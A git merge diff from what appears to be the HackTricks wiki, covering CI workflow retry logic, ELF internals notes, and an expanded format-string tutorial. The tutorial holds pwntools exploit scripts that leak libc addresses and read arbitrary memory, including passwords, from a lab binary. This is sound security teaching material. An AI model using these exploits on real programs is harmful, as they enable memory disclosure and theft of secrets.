Merge branch 'master' into update_ADWSDomainDump_20260217_190247

Author: carlospolop

.github/workflows/auto_merge_approved_prs.yml

@@ -37,8 +37,38 @@ jobs:
       - name: Check for running workflows
         id: check_workflows
         run: |
+          gh_with_retry() {
+            local max_attempts=5
+            local base_sleep_seconds=2
+            local attempt=1
+            local stderr_file
+            stderr_file=$(mktemp)
+
+            while true; do
+              if gh "$@" 2>"$stderr_file"; then
+                rm -f "$stderr_file"
+                return 0
+              fi
+
+              local exit_code=$?
+              if [ "$attempt" -ge "$max_attempts" ]; then
+                echo "gh command failed after $max_attempts attempts: gh $*" >&2
+                cat "$stderr_file" >&2
+                rm -f "$stderr_file"
+                return "$exit_code"
+              fi
+
+              local sleep_for=$((base_sleep_seconds * attempt))
+              echo "gh command failed (attempt $attempt/$max_attempts): gh $*" >&2
+              cat "$stderr_file" >&2
+              echo "Retrying in ${sleep_for}s..." >&2
+              sleep "$sleep_for"
+              attempt=$((attempt + 1))
+            done
+          }
+
           # Get all running workflows except this one
-          running_workflows=$(gh run list --status in_progress --json workflowName,name --repo "$GITHUB_REPOSITORY" --jq '.[].name' | grep -v "Auto Merge Approved PRs" | wc -l)
+          running_workflows=$(gh_with_retry run list --status in_progress --json workflowName,name --repo "$GITHUB_REPOSITORY" --jq '.[].name' | grep -v "Auto Merge Approved PRs" | wc -l)
           echo "running_workflows=$running_workflows" >> $GITHUB_OUTPUT
           
           if [ "$running_workflows" -gt 0 ]; then
@@ -54,14 +84,44 @@ jobs:
       - name: Find and merge approved PRs
         if: steps.check_workflows.outputs.should_continue == 'true'
         run: |
+          gh_with_retry() {
+            local max_attempts=5
+            local base_sleep_seconds=2
+            local attempt=1
+            local stderr_file
+            stderr_file=$(mktemp)
+
+            while true; do
+              if gh "$@" 2>"$stderr_file"; then
+                rm -f "$stderr_file"
+                return 0
+              fi
+
+              local exit_code=$?
+              if [ "$attempt" -ge "$max_attempts" ]; then
+                echo "gh command failed after $max_attempts attempts: gh $*" >&2
+                cat "$stderr_file" >&2
+                rm -f "$stderr_file"
+                return "$exit_code"
+              fi
+
+              local sleep_for=$((base_sleep_seconds * attempt))
+              echo "gh command failed (attempt $attempt/$max_attempts): gh $*" >&2
+              cat "$stderr_file" >&2
+              echo "Retrying in ${sleep_for}s..." >&2
+              sleep "$sleep_for"
+              attempt=$((attempt + 1))
+            done
+          }
+
           authorized_user="carlospolop"
           max_merges=2
 
           echo "Authorized user: $authorized_user"
           echo "Looking for PRs with exact comment 'merge' from $authorized_user..."
 
           # Get all open PRs
-          prs=$(gh pr list --state open --json number,title,url,author --repo "$GITHUB_REPOSITORY")
+          prs=$(gh_with_retry pr list --state open --json number,title,url,author --repo "$GITHUB_REPOSITORY")
 
           if [ "$prs" = "[]" ]; then
             echo "No open PRs found."
@@ -98,7 +158,10 @@ jobs:
             has_merge_comment=false
             if [ "$eligible_by_title" != true ]; then
               # Get all comments for this PR
-              comments=$(gh pr view "$pr_number" --json comments --jq '.comments[]' --repo "$GITHUB_REPOSITORY")
+              if ! comments=$(gh_with_retry pr view "$pr_number" --json comments --jq '.comments[]' --repo "$GITHUB_REPOSITORY"); then
+                echo "Failed to fetch comments for PR #$pr_number after retries. Skipping PR."
+                continue
+              fi
 
               # Print all comment authors for debugging
               echo "Comments in PR #$pr_number:"
@@ -123,15 +186,21 @@ jobs:
               echo "Attempting to merge PR #$pr_number..."
 
               # Get PR details including head branch
-              pr_details=$(gh pr view "$pr_number" --json headRefName,baseRefName --repo "$GITHUB_REPOSITORY")
+              if ! pr_details=$(gh_with_retry pr view "$pr_number" --json headRefName,baseRefName --repo "$GITHUB_REPOSITORY"); then
+                echo "Failed to fetch details for PR #$pr_number after retries. Skipping PR."
+                continue
+              fi
               head_branch=$(echo "$pr_details" | jq -r '.headRefName')
               base_branch=$(echo "$pr_details" | jq -r '.baseRefName')
 
               # --- Polling for non-UNKNOWN mergeable status ---
               max_retries=10
               retry=0
               while true; do
-                pr_mergeable=$(gh pr view "$pr_number" --json mergeable --jq '.mergeable' --repo "$GITHUB_REPOSITORY")
+                if ! pr_mergeable=$(gh_with_retry pr view "$pr_number" --json mergeable --jq '.mergeable' --repo "$GITHUB_REPOSITORY"); then
+                  echo "Failed to fetch mergeable status for PR #$pr_number after retries."
+                  pr_mergeable="UNKNOWN"
+                fi
                 if [ "$pr_mergeable" != "UNKNOWN" ]; then
                   break
                 fi

.github/workflows/build_master.yml

@@ -178,4 +178,9 @@ jobs:
 
       - name: Upload root ads.txt
         run: aws s3 cp ./src/ads.txt s3://hacktricks-wiki/ads.txt --content-type text/plain --cache-control max-age=300
+
+      - name: Upload root robots.txt
+        run: |
+          aws s3 cp ./src/robots.txt s3://hacktricks-wiki/robots.txt --content-type text/plain --cache-control max-age=300
+          aws s3 cp ./src/robots.txt s3://hacktricks-wiki/en/robots.txt --content-type text/plain --cache-control max-age=300
       

src/SUMMARY.md

@@ -278,6 +278,7 @@
   - [Semanagevolume Perform Volume Maintenance Tasks](windows-hardening/windows-local-privilege-escalation/semanagevolume-perform-volume-maintenance-tasks.md)
   - [Service Triggers](windows-hardening/windows-local-privilege-escalation/service-triggers.md)
   - [Telephony Tapsrv Arbitrary Dword Write To Rce](windows-hardening/windows-local-privilege-escalation/telephony-tapsrv-arbitrary-dword-write-to-rce.md)
+  - [Uiaccess Admin Protection Bypass](windows-hardening/windows-local-privilege-escalation/uiaccess-admin-protection-bypass.md)
   - [Windows C Payloads](windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md)
 - [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
   - [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md)

src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md

@@ -218,6 +218,11 @@ Each symbol entry contains:
 - **Value** (address sin memory)
 - **Size**
 
+#### GNU IFUNC (indirect functions)
+
+- GCC can emit `STT_GNU_IFUNC` symbols with the `__attribute__((ifunc("resolver")))` extension. The dynamic loader calls the resolver at load time to select the concrete implementation (commonly CPU dispatch).
+- Quick triage: `readelf -sW ./bin | rg -i "IFUNC"`
+
 #### GNU Symbol Versioning (dynsym/dynstr/gnu.version)
 
 Modern glibc uses symbol versions. You will see entries in `.gnu.version` and `.gnu.version_r` and symbol names like `strlen@GLIBC_2.17`. The dynamic linker can require a specific version when resolving a symbol. When crafting manual relocations (e.g. ret2dlresolve) you must supply the correct version index, otherwise resolution fails.
@@ -354,6 +359,11 @@ Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries:
 00000001ffa8  003000000402 R_AARCH64_JUMP_SL 0000000000000000 fgets@GLIBC_2.17 + 0
 ```
 
+#### Packed relative relocations (RELR)
+
+- Modern linkers can emit compact **relative** relocations with `-z pack-relative-relocs`. This adds `DT_RELR`, `DT_RELRSZ`, and `DT_RELRENT` entries to the dynamic section for PIEs/shared libraries (it is ignored for non-PIE executables).
+- Recon: `readelf -d ./bin | egrep -i "DT_RELR|RELRSZ|RELRENT"`
+
 ### Static Relocations
 
 If the **program is loaded in a place different** from the preferred address (usually 0x400000) because the address is already used or because of **ASLR** or any other reason, a static relocation **corrects pointers** that had values expecting the binary to be loaded in the preferred address.
@@ -420,11 +430,11 @@ Note that these global variables are located in `.data` or `.bss` but in the lis
 From C code it's possible to obtain the same result using the GNU extensions :
 
 ```c
-__attributte__((constructor)) //Add a constructor to execute before
-__attributte__((destructor)) //Add to the destructor list
+__attribute__((constructor)) //Add a constructor to execute before
+__attribute__((destructor)) //Add to the destructor list
 ```
 
-From a compiler perspective, to execute these actions before and after the `main` function is executed, it's possible to create a `init` function and a `fini` function which would be referenced in the dynamic section as **`INIT`** and **`FIN`**. and are placed in the `init` and `fini` sections of the ELF.
+From a compiler perspective, to execute these actions before and after the `main` function is executed, it's possible to create a `init` function and a `fini` function which would be referenced in the dynamic section as **`INIT`** and **`FINI`**. and are placed in the `init` and `fini` sections of the ELF.
 
 The other option, as mentioned, is to reference the lists **`__CTOR_LIST__`** and **`__DTOR_LIST__`** in the **`INIT_ARRAY`** and **`FINI_ARRAY`** entries in the dynamic section and the length of these are indicated by **`INIT_ARRAYSZ`** and **`FINI_ARRAYSZ`**. Each entry is a function pointer that will be called without arguments.
 
@@ -491,6 +501,8 @@ Leaking `AT_RANDOM` gives you the canary value if you can dereference that point
 
 ## References
 
+- GCC Common Function Attributes (ifunc / STT_GNU_IFUNC): https://gcc.gnu.org/onlinedocs/gcc-14.3.0/gcc/Common-Function-Attributes.html
+- GNU ld `-z pack-relative-relocs` / `DT_RELR` docs: https://sourceware.org/binutils/docs/ld.html
 - ld.so(8) – Dynamic Loader search order, RPATH/RUNPATH, secure-execution rules (AT_SECURE): https://man7.org/linux/man-pages/man8/ld.so.8.html
 - getauxval(3) – Auxiliary vector and AT_* constants: https://man7.org/linux/man-pages/man3/getauxval.3.html
 {{#include ../../banners/hacktricks-training.md}}

src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md

@@ -48,6 +48,9 @@ log.info(p.clean())
 
 ## Read passwords
 
+<details>
+<summary>Vulnerable binary with stack and BSS passwords</summary>
+
 ```c
 #include <stdio.h>
 #include <string.h>
@@ -79,6 +82,8 @@ int main() {
 }
 ```
 
+</details>
+
 Compile it with:
 
 ```bash
@@ -116,6 +121,9 @@ Running the same exploit but with `%p` instead of `%s` it's possible to leak a h
 
 Now it's time to find how to control 1 address in the stack to access it from the second format string vulnerability:
 
+<details>
+<summary>Find controllable stack address</summary>
+
 ```python
 from pwn import *
 
@@ -143,12 +151,17 @@ for i in range(30):
     p.close()
 ```
 
+</details>
+
 And it's possible to see that in the **try 14** with the used passing we can control an address:
 
 <figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>
 
 ### Exploit
 
+<details>
+<summary>Leak heap then read password</summary>
+
 ```python
 from pwn import *
 
@@ -179,9 +192,68 @@ print(output)
 p.close()
 ```
 
+</details>
+
 <figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>
 
-{{#include ../../banners/hacktricks-training.md}}
+### Automating the offset discovery
+
+When the stack layout changes on every run (full ASLR/PIE), bruteforcing offsets manually is slow. `pwntools` exposes `FmtStr` to automatically detect the argument index that reaches our controlled buffer. The lambda should return the program output after sending the candidate payload. It stops as soon as it can reliably corrupt/observe memory.
+
+```python
+from pwn import *
+
+context.binary = elf = ELF('./fs-read', checksec=False)
+
+# helper that sends payload and returns the first line printed
+io = process()
+def exec_fmt(payload):
+    io.sendline(payload)
+    return io.recvuntil(b'\n', drop=False)
+
+fmt = FmtStr(exec_fmt=exec_fmt)
+offset = fmt.offset
+log.success(f"Discovered offset: {offset}")
+```
+
+You can then reuse `offset` to build arbitrary read/write payloads with `fmtstr_payload`, avoiding manual `%p` fuzzing.
 
+### PIE/libc leak then arbitrary read
 
+On modern binaries with PIE and ASLR, first leak any libc pointer (e.g. `__libc_start_main+243` or `setvbuf`), compute bases, then place your target address after the format string. This keeps the `%s` from being truncated by null bytes inside the pointer.
 
+<details>
+<summary>Leak libc and read arbitrary address</summary>
+
+```python
+from pwn import *
+
+elf = context.binary = ELF('./fs-read', checksec=False)
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+
+io = process()
+
+# leak libc address from stack (offset 25 from previous fuzz)
+io.sendline(b"%25$p")
+io.recvline()
+leak = int(io.recvline().strip(), 16)
+libc.address = leak - libc.symbols['__libc_start_main'] - 243
+log.info(f"libc @ {hex(libc.address)}")
+
+secret = libc.address + 0x1f7bc   # adjust to your target
+
+payload = f"%14$s|||".encode()
+payload += p64(secret)
+
+io.sendline(payload)
+print(io.recvuntil(b"|||"))  # prints string at calculated address
+```
+
+</details>
+
+## References
+
+- [NVISO - Format string exploitation](https://blog.nviso.eu/2024/05/23/format-string-exploitation-a-hands-on-exploration-for-linux/)
+- [Format string exploitation notes](https://hackmd.io/%40e20gJPRhRbKrBY5xcGKngA/SyM_Wcg_A)
+
+{{#include ../../banners/hacktricks-training.md}}